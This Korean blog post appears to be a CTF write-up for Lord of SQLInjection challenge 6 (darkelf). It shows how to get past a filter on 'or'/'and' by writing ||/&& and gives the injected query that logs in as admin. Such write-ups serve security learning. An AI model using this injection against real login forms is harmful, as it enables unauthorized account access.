본문 바로가기
CTF/los

[CTF] Lord of SQLInjection 6번 darkelf Write-Up

by spareone 2026. 3. 10.

los 6번 darkelf Write-Up 입니다.

[그림 1] 문제 메인 페이지

이번엔 or, and가 filtering 되고 있습니다.

하지만 or은 ||, and는 &&로 바꾸어 우회가 가능합니다. 심지어 이렇게 쓰면 앞 뒤 공백이 필요 없습니다.

select id from prob_darkelf where id='guest' and pw=''||id='admin'

이렇게 입력하면 됩니다.

[그림 2] 문제 정답처리

URL Encoding 후 데이터를 전달하면 문제가 정답처리 됩니다.


'CTF > los' 카테고리의 다른 글

[CTF] Lord of SQLInjection 8번 troll Write-Up  (1) 2026.03.10
[CTF] Lord of SQLInjection 7번 orge Write-Up  (0) 2026.03.10
[CTF] Lord of SQLInjection 5번 wolfman Write-Up  (0) 2026.03.10
[CTF] Lord of SQLInjection 4번 orc Write-Up  (0) 2026.03.10
[CTF] Lord of SQLInjection 3번 goblin Write-Up  (0) 2026.03.10

관련글

댓글

티스토리툴바